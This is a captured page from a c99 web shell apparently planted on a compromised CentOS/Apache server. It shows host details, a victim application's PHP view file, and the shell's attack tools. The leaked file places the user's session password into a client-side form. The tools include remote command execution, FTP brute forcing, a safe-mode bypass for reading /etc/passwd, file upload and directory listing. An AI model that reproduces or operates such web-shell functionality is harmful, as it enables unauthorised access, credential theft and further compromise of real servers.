!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/info/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_info.php (3.54 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<script language="javascript">
    function doMainMenu(stid,gpid,url){
        if(url.search(".php")>0){
            //alert(url);
            document.info_ctrl.action = "<?=base_url();?>"+url;
            document.info_ctrl.userName.value = "<?=$this->session->userdata('UsLogin');?>";
            document.info_ctrl.password.value = "<?=$this->session->userdata('UsPassword');?>";
            document.info_ctrl.submit();
        }else{
            document.info_ctrl.action = 'mainMenu';
            document.info_ctrl.stid.value = stid;
            document.info_ctrl.gpid.value = gpid;
            document.info_ctrl.submit();
        }
    }
</script>
<table width="100%" border="0" cellspacing="0" cellpadding="0" summary="" valign="top">
<?php
//print_r($this->session->all_userdata());

if(isset($system)){

    
$st 0;
//    echo $user->getname();
    
foreach($system->result() as $row){

        
$stid $row->GpStID;
        
$gpid $row->GpID;
        if(
$row->GpStID != $st){
            
$st $row->GpStID;
            
$sub 0;
?>
            <tr><td colspan='4'>&nbsp;</td></tr>
            <tr>
            <td colspan='4'><span style="font-weight: bold;font-size: 12pt; color:#0033FF;"><?php echo $row->StNameT?></span></td>
            </tr>
            <tr><td colspan='2' align='left'><img src='<?php echo base_url().'images/grouping_bar.jpg';?>' ></td></tr>
<?
        
}
        if(
$sub == 0){
            echo 
"<tr>";
        }elseif(
$sub == 4){
            
$sub 0;
            echo 
"</tr>";
        }
        
$sub+=1;
        
$name preg_split('[-]'$row->GpNameT);
        if(!isset(
$name[1])){
            
$name[1] = $name[0];
            
$name[0] = $row->StNameT;
        }
        echo 
"<td><table><tr>";
        echo 
"<td width=32 ><img src='".base_url()."images/subsysgrp.gif'></td><td>";
        
//echo "<td onclick=\"doSubmit($stid,$gpid)\" >";
//        echo anchor("info/info/mainMenu/$stid/$gpid",$name[0].'<br>'.$name[1],array() );
        //echo $name[1];
        //array( 'onMouseOver'=>"window.status=' '; return true" )
?>
                <span style="font-weight: bold; " onclick="doMainMenu(<?=$stid?>,<?=$gpid?>,'<?=$row->StURL?>')" onmouseover="this.style.cursor='pointer';this.style.color = '#0066FF';" onmouseout="this.style.color = '#000000';">
                <?php echo $name[0].'<br>'.$name[1]?>
                </span>
<?php
        
echo "</td></tr></table></td>";
}
?>

<? 
}elseif(isset($sm)){
?>

<?        foreach($sm as $v => $row ){ ?>
        <tr valign="top">
        <?//    for($i=0;$i<$row['MnLevel'];$i++){ ?>

<?    //} 
            
if($row['MnURL']!=''){
        
?>
                <td  ><?php echo nbs(4*$row['MnLevel']);?>
                <img src="<?=base_url();?>images/submenu_mini.gif" width="18" align="absmiddle">&nbsp;
                <span onclick="doSubmitMn(<?=$row['MnStID']?>,<?=$row['MnID']?>)" onmouseover="this.style.cursor='pointer';this.style.color = '#0066FF';" onmouseout="this.style.color = '#000000';">
                <?=$row['MnNameT']?>
                </span>
                </td> 
         <? 
         
//echo anchor(site_url()."info/info/subMenu/".$row['MnStID'].'/'.$row['MnID'],$row['MnNameT']); //array( 'onMouseOver'=>"window.status=' '; return true" )?>
        <?    }else{ ?>
                <td><?php echo nbs(4*$row['MnLevel']);?>
                <img src="<?=base_url();?>images/submenu_mini.gif" width="18" align="absmiddle">&nbsp;<? echo $row['MnNameT']; //array( 'onMouseOver'=>"window.status=' '; return true" )?>
                </td>
        <?    ?>
            
         </tr>
<?        ?>

     
<?
}else{ 
?>
        <tr >
            <td align="center">
                <img src="<?=base_url()?>images/infosys-v2.0.1.0.00.jpg" width='288' height='59' align='center'>
            </td> 
         </tr>
<? ?></table>


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--